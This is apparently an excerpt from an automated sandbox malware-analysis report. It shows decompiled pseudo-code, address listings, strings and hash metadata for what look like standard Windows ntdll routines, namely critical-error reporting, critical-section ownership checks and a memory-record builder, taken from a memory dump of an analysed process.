                    Function 01718DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                    Download Yara Rule
                    C-Code - Quality: 71%
                    			E01718DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1740d50);
				E016BD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E016F5720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L016BDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L016BDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E016BD130(_t34, _t39, _t40);
			}





                    0x01718df1
                    0x01718df1
                    0x01718df1
                    0x01718df1
                    0x01718df1
                    0x01718df1
                    0x01718df3
                    0x01718df8
                    0x01718dfd
                    0x01718e00
                    0x01718e0e
                    0x01718e2a
                    0x01718e36
                    0x01718e38
                    0x01718e3c
                    0x01718e46
                    0x01718e46
                    0x01718e36
                    0x01718e50
                    0x01718e56
                    0x01718e59
                    0x01718e5c
                    0x01718e60
                    0x01718e67
                    0x01718e6d
                    0x01718e73
                    0x01718e74
                    0x01718eb1
                    0x01718ebd

                    Strings
                    • Critical error detected %lx, xrefs: 01718E21
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: Critical error detected %lx
                    • API String ID: 0-802127002
                    • Opcode ID: 5f493f75ff37859889e97364d86e2feb8ba5005412bb8692219abe685b3b8213
                    • Instruction ID: cc4d6fe61b486651fa1068be22bb4edcf3ddb1bf1f4be6c9e7b1fac4e8fe0d81
                    • Opcode Fuzzy Hash: 5f493f75ff37859889e97364d86e2feb8ba5005412bb8692219abe685b3b8213
                    • Instruction Fuzzy Hash: 28117971D14348DBDB24CFA889057DDFBB1AB08314F24426DE529AB282C3300606CF15
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016FFF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                    Download Yara Rule
                    Strings
                    • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 016FFF60
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                    • API String ID: 0-1911121157
                    • Opcode ID: 7db19dff68c6e0a16156f85eab7225aabbe5224e3e537146d9799e2007bbd11c
                    • Instruction ID: 3f981640268cdeafe4218a39e9b36750451b4a543e5b39aa759267337cde5542
                    • Opcode Fuzzy Hash: 7db19dff68c6e0a16156f85eab7225aabbe5224e3e537146d9799e2007bbd11c
                    • Instruction Fuzzy Hash: F111A172911244EFDB26DB58CD88FA8BBB2BB04719F14849CE6096B261C7799980CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01735BA5 Relevance: .6, Instructions: 592COMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E01735BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1741178);
				E016BD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01734C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E016AD000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01735542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x17560e8;
								if( *0x17560e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x17560e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E016A9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E016A6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E016AF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E016AF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E016AF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E016AFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E016AFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E016AF3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E016AF3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E01734CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E016BD130(_t427, _t494, _t511);
				}
			}










































































                    0x01735ba5
                    0x01735baa
                    0x01735baf
                    0x01735bb4
                    0x01735bb6
                    0x01735bbc
                    0x01735bbe
                    0x01735bc4
                    0x01735bcd
                    0x01735bd3
                    0x01735bd6
                    0x01735bdc
                    0x01735be0
                    0x01735be3
                    0x01735beb
                    0x01735bf2
                    0x01735bf8
                    0x01735bfe
                    0x01735c04
                    0x01735c0e
                    0x01735c18
                    0x01735c1f
                    0x01735c25
                    0x01735c2a
                    0x01735c2c
                    0x01735c32
                    0x01735c3a
                    0x01735c3f
                    0x01735c42
                    0x01735c48
                    0x01735c5b
                    0x01735c5b
                    0x01735c2c
                    0x01735cb7
                    0x01735cb9
                    0x01735cbf
                    0x01735cc2
                    0x01735cca
                    0x01735ccb
                    0x01735ccb
                    0x01735cd1
                    0x01735cd7
                    0x01735cda
                    0x01735ce1
                    0x01735ce4
                    0x01735ce7
                    0x01735ced
                    0x01735cf3
                    0x01735cf9
                    0x01735cff
                    0x01735d08
                    0x01735d0a
                    0x01735d0e
                    0x01735d10
                    0x00000000
                    0x00000000
                    0x01735d16
                    0x01735d1a
                    0x00000000
                    0x00000000
                    0x01735d20
                    0x01735d22
                    0x01735d25
                    0x01735d2f
                    0x01735d2f
                    0x01735d33
                    0x01735d3d
                    0x01735d49
                    0x01735d4b
                    0x00000000
                    0x00000000
                    0x01735d5a
                    0x01735d5d
                    0x01735d60
                    0x00000000
                    0x00000000
                    0x01735d66
                    0x01735d69
                    0x00000000
                    0x00000000
                    0x01735d6f
                    0x01735d6f
                    0x01735d73
                    0x01735d79
                    0x01735d7f
                    0x01735d86
                    0x01735d95
                    0x01735d98
                    0x01735dba
                    0x01735dcb
                    0x01735dce
                    0x01735dd3
                    0x01735dd6
                    0x01735dd8
                    0x01735de6
                    0x01735dec
                    0x01735dee
                    0x01735df1
                    0x01735df3
                    0x0173635a
                    0x0173635a
                    0x00000000
                    0x0173635a
                    0x01735dfe
                    0x01735e02
                    0x01735e05
                    0x01735e07
                    0x01735e10
                    0x01735e13
                    0x01735e1b
                    0x01735e1c
                    0x01735e21
                    0x01735e22
                    0x01735e23
                    0x01735e25
                    0x01735e2a
                    0x01735e2c
                    0x01735e2e
                    0x01735e36
                    0x01735e39
                    0x01735e42
                    0x01735e47
                    0x01735e4d
                    0x01735e54
                    0x01735e54
                    0x01735e54
                    0x01735e2e
                    0x01735e5c
                    0x01735e5f
                    0x01735e62
                    0x01735e64
                    0x01735e6b
                    0x01735e70
                    0x01735e7a
                    0x01735e7a
                    0x01735e7a
                    0x01735e6b
                    0x01735e7e
                    0x01735e7f
                    0x01735e7f
                    0x01735e81
                    0x01735e87
                    0x01735e8b
                    0x01735e8c
                    0x01735e8c
                    0x01735e8c
                    0x01735e9a
                    0x01735e9c
                    0x01735ea2
                    0x01735ea6
                    0x01735f50
                    0x01735f50
                    0x01735f57
                    0x01735f66
                    0x01735f66
                    0x01735f66
                    0x01735f68
                    0x01735f6a
                    0x017363d0
                    0x00000000
                    0x01735f70
                    0x01735f70
                    0x01735f91
                    0x01735f9c
                    0x01735f9e
                    0x01735fa4
                    0x01735fa6
                    0x0173638c
                    0x01736392
                    0x017363a1
                    0x017363a7
                    0x017363af
                    0x017363af
                    0x017363bd
                    0x017363d8
                    0x00000000
                    0x017363d8
                    0x01735fac
                    0x01735fb2
                    0x01735fb4
                    0x01735fbd
                    0x01735fc6
                    0x01735fce
                    0x01735fd4
                    0x01735fdc
                    0x01735fec
                    0x01735fed
                    0x01735fee
                    0x01735fef
                    0x01735ff9
                    0x01735ffa
                    0x01735ffb
                    0x01735ffc
                    0x01736000
                    0x01736004
                    0x01736012
                    0x01736012
                    0x01736018
                    0x01736019
                    0x0173601a
                    0x0173601b
                    0x0173601c
                    0x01736020
                    0x01736059
                    0x0173605c
                    0x01736061
                    0x01736061
                    0x01736022
                    0x01736022
                    0x01736022
                    0x01736025
                    0x0173602a
                    0x0173602b
                    0x01736031
                    0x01736037
                    0x01736038
                    0x0173603e
                    0x01736048
                    0x01736049
                    0x0173604a
                    0x0173604b
                    0x0173604c
                    0x0173604d
                    0x01736053
                    0x01736054
                    0x01736054
                    0x01736062
                    0x01736065
                    0x01736067
                    0x0173606a
                    0x01736070
                    0x01736075
                    0x01736076
                    0x01736081
                    0x01736087
                    0x01736095
                    0x01736099
                    0x0173609e
                    0x017360a4
                    0x017360ae
                    0x017360b0
                    0x017360b3
                    0x017360b6
                    0x017360b8
                    0x017360ba
                    0x017360ba
                    0x017360ba
                    0x017360ba
                    0x017360be
                    0x017360c0
                    0x017360c5
                    0x017360c5
                    0x017360c5
                    0x017360c6
                    0x017360cd
                    0x01736114
                    0x017360cf
                    0x017360cf
                    0x017360d4
                    0x017360d5
                    0x017360da
                    0x017360db
                    0x017360e1
                    0x017360e2
                    0x017360e8
                    0x017360f8
                    0x017360fd
                    0x017360fe
                    0x01736102
                    0x01736104
                    0x01736107
                    0x01736109
                    0x0173610b
                    0x0173610b
                    0x0173610b
                    0x0173610b
                    0x0173610f
                    0x0173610f
                    0x01736117
                    0x0173611a
                    0x0173611f
                    0x01736125
                    0x01736134
                    0x01736139
                    0x0173613f
                    0x01736146
                    0x01736148
                    0x0173614b
                    0x0173614d
                    0x0173614f
                    0x0173614f
                    0x0173614f
                    0x0173614f
                    0x01736153
                    0x01736159
                    0x01736159
                    0x0173615c
                    0x01736163
                    0x01736169
                    0x0173616c
                    0x01736172
                    0x01736181
                    0x01736186
                    0x01736187
                    0x0173618b
                    0x01736191
                    0x01736195
                    0x017361a3
                    0x017361bb
                    0x017361c0
                    0x017361c3
                    0x017361cc
                    0x017361d0
                    0x017361dc
                    0x017361de
                    0x017361e1
                    0x017361e4
                    0x017361e6
                    0x017361e8
                    0x017361e8
                    0x017361e8
                    0x017361e8
                    0x017361e6
                    0x017361ec
                    0x017361f3
